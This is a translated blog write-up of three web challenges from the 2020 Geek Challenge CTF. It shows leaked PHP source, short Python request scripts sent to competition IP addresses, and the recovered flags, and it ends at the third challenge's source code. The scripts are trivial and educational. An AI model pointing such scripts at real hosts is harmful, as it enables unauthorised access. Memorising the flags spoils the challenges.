CTF: 2020 极客大挑战 (Geek Challenge)

Web

EZwww


Following the hint, we find that the site's source code has been leaked as a backup archive:

http://47.100.46.169:3901/www.zip

After unzipping it, the code is as follows:

```php
<html>
<head>
<title>Lola's website1.0</title>
</head>
<body>
<?php echo '<h1>welcome to my website</h1>'; ?>
<?php echo '<p>i will never forget to backup my website......</p>'; ?>
<?php echo '<img src="img/lola.gif" alt="welcome~"/>'; ?>
</body>
</html>
<?php
$key1 = $_POST['a'];
$key2 = base64_decode('c3ljbDB2ZXI=');
if($key1 === $key2)
{
//this is a true flag
echo '<p>SYC{xxxxxxxxxxxxxxxxxx}</p>';
}
?>
```

So as long as the POST parameter `a` equals `base64_decode('c3ljbDB2ZXI=')`, the strict comparison passes and the flag is printed.

The exploit is as follows:

```python
import requests
import base64

secret = 'c3ljbDB2ZXI='
ip = '47.100.46.169:3901'
url = 'http://%s/index.php' % ip
data = {
    # send the decoded key as a string so it matches the server's $key2 exactly
    'a': base64.b64decode(secret).decode()
}
print("POST %s\t%s" % (url, str(data)))
response = requests.post(url, data=data)
print(response.text)
```

Response:

```html
<html>
<head>
<title>Lola's website1.0</title>
</head>
<body>
<br><h1>This website has been backed up</h1><br> dont forget to post something important to get what you want ~QAQ~ <br><br><img src="img/lola.gif" alt="welcome~"/> </body>
</html>
<p>SYC{Backup_1s_4_good_h4bit_l0l}</p>
```

SYC{Backup_1s_4_good_h4bit_l0l}

刘壮's Black Page (刘壮的黑页)


Opening the page, it is completely black, which left me stumped.

I immediately changed the background colour to white to make the content visible.

![2.png](2.png)

At the bottom of the page there is PHP code:

```php
<?php
include("flag.php");
highlight_file(__FILE__);
$username = $_GET['username'];
$passwd = $_POST['passwd'];
if ($username === 'admin' && $passwd === 'syclover') {
echo $flag;
}
```

The GET parameter just has to be carried in the URL while sending the POST body.

The exploit is as follows:

```python
import requests

ip = '106.54.75.217:8080'
username = 'admin'
password = 'syclover'
# username travels in the query string ($_GET), passwd in the body ($_POST)
url = "http://%s/?username=%s" % (ip, username)
data = {
    'passwd': password
}
response = requests.post(url, data=data)
print(response.text)
```

Welcome


Testing shows that GET requests are blocked.

Trying a POST request instead returns the page source, as follows:

```php
<?php
error_reporting(0);
if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
header("HTTP/1.1 405 Method Not Allowed");
exit();
} else {

if (!isset($_POST['roam1']) || !isset($_POST['roam2'])){
show_source(__FILE__);
}
else if ($_POST['roam1'] !== $_POST['roam2'] && sha1($_POST['roam1']) === sha1($_POST['roam2'])){
phpinfo(); // collect information from phpinfo!
}
}
```
Author: 咲夜南梦
Article link: http://yoursite.com/2020/10/22/CTF-2020%E5%B9%B4%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98/
Copyright notice: Unless otherwise stated, all articles on this blog are licensed under CC BY-NC-SA 4.0. Please credit 咲夜南梦's blog when reposting.